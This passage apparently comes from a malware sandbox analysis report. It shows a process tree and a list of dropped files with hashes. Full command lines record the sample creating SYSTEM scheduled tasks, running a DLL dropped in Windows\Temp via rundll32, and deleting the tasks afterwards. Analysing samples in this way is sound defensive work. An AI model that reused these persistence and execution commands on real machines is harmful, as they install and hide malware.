C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KQGqlBuRrHzEMwByVTe2" /F /xml "C:\Program Files (x86)\bgwuTdWixDdNC\yhspSoI.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:3456
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "kPVQaxkVtdiJeIOQR" /SC once /ST 04:27:57 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\sFyaDrJXZzAeWCdu\kNXyCiZq\ypelemw.dll\",#1 /zdidWV 385137" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:4620
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "kPVQaxkVtdiJeIOQR"2⤵PID:3428
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "KdMGsZYUagVlNoZLt"2⤵PID:648
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 388 -s 23682⤵
- Program crash
PID:2836
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4752 -ip 47521⤵PID:3972
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\sFyaDrJXZzAeWCdu\kNXyCiZq\ypelemw.dll",#1 /zdidWV 3851371⤵PID:3360
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\sFyaDrJXZzAeWCdu\kNXyCiZq\ypelemw.dll",#1 /zdidWV 3851372⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1080 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "kPVQaxkVtdiJeIOQR"3⤵PID:3280
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3908 -ip 39081⤵PID:2476
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 388 -ip 3881⤵PID:2684
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5f65f04e5e57ecf3118b681ad5311252d
SHA19958d4aa6bd25b9b20b89b3b5723c2cee2af4bce
SHA2566528c0cfec2a1b8645856e219659520fd4fd424117d20fce465bdd901d037fc5
SHA5121ce9f9f8b563a2ed36ab5b8a5b8e6211fd040d09153f526508e3c2f247a258b2badd23264ebe0851eecfc6ef71b9e982ee96b1fde3b0a146b8c4991809cf35be
-
Filesize
2KB
MD5650e773dd48e140447fb60189ac9b1f5
SHA140c484a72142deeb85ee653c85b93b59d9d4856e
SHA2569c9280e125d9f1c437fe3f2c5bb45605122357dc004891c839d8636cddd13daa
SHA5123099be3657f4309f4bf6f0e6acc56155755b7d46ac966e1220d98d2f50b07f4de70118723bec0f5f8f84ecf8f62a8acfb3d130c9c1c9b96e8a4e9316ed842ce7
-
Filesize
2KB
MD55de2ff54472e036778fbceb3bc70dffd
SHA124895bedd28a73bd213117ae03a79b833a954771
SHA256a55a75a3030b2235963cce7af259cf83e9b7422248cbaef0632a080aba05bdbf
SHA512daec7996f6d58bccc4bf5d5020a75173dbc518668ec34abf950dcfd48ae42a8c90566ad5e30e4f84fcd37ed625d696316ebcba706d8e2e2f028819d95de59b92
-
Filesize
2KB
MD570a2dc851a28d700a8a647f41db153e7
SHA1486da780448975ffa218806f2e8113987151d659
SHA25635ce7b45e33bbd82cf599761cfc412c6ceb4a3d7c94648168f2820aa0d2903ce
SHA5125fcdf804fcfb2deb3c57d408009d4f8b571c0357117d751cd3bdc38a07124f260616149eec9ee23419caa2fb59c3668ed9e3580931d044c7e30fe97c4f949c3e
-
Filesize
2.5MB
MD55e961b38133d2b086e5b7bf15d516073
SHA197ad471f114961714e894f04997305ed363b77dd
SHA256bd5b4ef162e4d98e883594553c7e204dadd865898965a8c181aea3f426655cb4
SHA5124146e405cd8e15979064b6113bbd07b4913a3b11991dccb76b8a2865d590b421d0633c19d2c859b83cfd0f576eb3755f69b313925cb9b2feb9ca647bc0c72e51
-
Filesize
2KB
MD54bdda4e1292be62d2abe96014e6f0fd5
SHA13255e2c10a185fd0c99818a851b6a1c579a645ab
SHA256264af05187a2db0158ea42e9dbf8d0fc200f2d46dc56daf4e761d37d71c9bcf1
SHA51267a159c2e5354827e3c43d1a79f427881c8871e309d8275b4ed7b1d92cd6a0f95b47b98350837b903db4dd0efc24d403dbee0d74fb83271745427cfd0fad5916
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
35KB
MD5b135d125faa4849ef206b07b791ed5e4
SHA127509fc9c6ca66bca8db794cad23a287bcfdf03d
SHA256d2f9c101f4047b6ca6d5a9c40725d484bbb8776d43d8e0555baf8f5c9edcec5a
SHA51248c5e75e84bbdc7141d06280ac62709e438345a9758ab6a8ea97ffab0708cb7ae73945542977180f675fcede6ed4e19b28c2f53a152bfe8b7d0e662025986dcf
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
Filesize151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
Filesize
11KB
MD559d1f472d28ed4a495f36577b9e25d8c
SHA1898b7bd383f3bf72b2ae8b9ce2f9c173cee9fa9c
SHA256ab8b784c996cb21d7b5bacafa5260127d6999505f0502716736ab106338f06b7
SHA512977df5db788307f4c668828395bd60677a654cf1d0801ec3e5373aafe7cfbe8e9b84298ed1cacb9bce78ba33851eae388f331acd45782546fa5ea70d72a65bb9
-
Filesize
6.4MB
MD56b20adaba1632d99690739d4de2bf273
SHA12ced1f9d89ceaec6508eb76b8a980834446cb015
SHA256c4d0e025e862782cbf0ba1307e22c5461a441c9fa2617c52a775c3682d47cac6
SHA51210640709f49f3b4ffee1b16740a5198aaeafaa897b350193bc3ed1c84f41fe04b906a931b0e0e204fba8a06a64cf76c17a0c1fadd46fc77d1337cf7d12786469
-
Filesize
6.7MB
MD571bf676ae80afa9f2577d2eae6a133ae
SHA10fedcfbd17c9a11a97ce5c6b984926b5a510f533
SHA2569f803c1fd9944d0050032ecd983de008c13c0e939e66d13c1d138551d290be99
SHA512f8150af3a932ead9e6968569978ddba194b6355d4ac65bfcd7e54302e2f7f4b944c27baf3763297f5edc2d8eddb89bafea2489a79e1a77c695cc65fd967cf545
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
8KB
MD5849c8adae9cfabd58c431d462c8d977d
SHA1cdcff4262f193ffcad2a124c705d8875c42c1ac5
SHA2566352c8d8076e29104e8f6b113776e4423a7c96035249ac792215a5a5403fff03
SHA512581c7c2eac863ecd439b206c9eb7d0c2e933322aa804c8fa8f0f0ff91a1de563a155d23ad6c035f7d4800ccb147b94bdf5c35a259d622c330dec77d13a616083
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD5aebf4bf6752c28a76f012ad901a1b27e
SHA19609832f721f53d59f2d01b9d740649f44f965ea
SHA25673316c4c39ce34c44aa26ba504def77616d56f1d7e4a4330ce67a3719ba7b7b4
SHA512dbf3b971ddcb84a3f5c6b76515a6d9f782fd34d109133cf3b1760596ca1b5bf92e6dd11947b430bba77cfc2ef93f8978d90aaba571d7e299a04e01c96428af50
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD58b2baa4a3a7e9cdba40a0c24dbe6d7d4
SHA165dfdad8b2a629d1b3c71ed2498e1c312a7a53a3
SHA256c85f39eb08eb396189b47279f0fc9bf5610346cbd98f9f0ae4b7d001cc8c481f
SHA5129e5fddde2c7b1caa3be2aff5a3dc163ce88b2e0a33994162ba332a098ac06742bb13b0f3f534e6426793973f3fda806968a5cae738bfb2344764aed1523dbded
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD597bc8f943d8599b5d005fe03027fca07
SHA10945f688d03b7b6894eb30ce56bc6523d1957641
SHA25627f1e76a6b11c07cad5ed5a0fb5fb8a3cc84ae67c0b60bcc8497cacf3f114454
SHA51224556ead967cbf6bc95f638b002fd8122c0671e38bc2e4f0a14f48e1755e54c02c0635d10bfb051d0c63b9ddb511ba6bea5678ef28d63c0e7d0108e3e8f6be82
-
Filesize
6.5MB
MD54dd6ffe036a2c5436f1e1e9d62c6f2bf
SHA148e9ca2c44a1e49133396c24d4901c2a4778309d
SHA256020dcc1479e413605e030d3596f00def68b27c1ad753f21c698dcede2e64b414
SHA512865c22e1a47fbc9c919c7f1a18df8f33c4c9e5f257f1f5ac86df15bbc11051d8cdd69659ba22db964d389be482fba65a82fa5f85b917a43a65781eb06e4744a5
-
Filesize
6KB
MD55a22f334d5c017e7706e57e6b8913150
SHA1e04c151448f8712f3105cafba88b8d534843ae6a
SHA2562b38e88280ac756d9edcc9e6ebc1533fdb69d8993ab755c6b007782a38fa9156
SHA51253f8f9d4f02c71b19e54922e5d7a97d2e8e50f897864365dcb3946f6228bfd1861b0195fb21e577399b59728f49962a076b178844d2d1326ec9927878286147d